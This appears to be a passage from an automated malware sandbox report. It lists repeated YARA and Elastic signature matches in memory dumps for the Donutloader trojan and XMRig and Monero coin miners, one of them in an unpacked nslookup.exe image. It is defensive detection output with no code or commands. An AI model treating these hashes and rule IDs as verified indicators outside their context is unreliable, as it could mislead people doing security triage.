              Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
              Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
              Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
              Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
              Source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
              Source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
              Source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
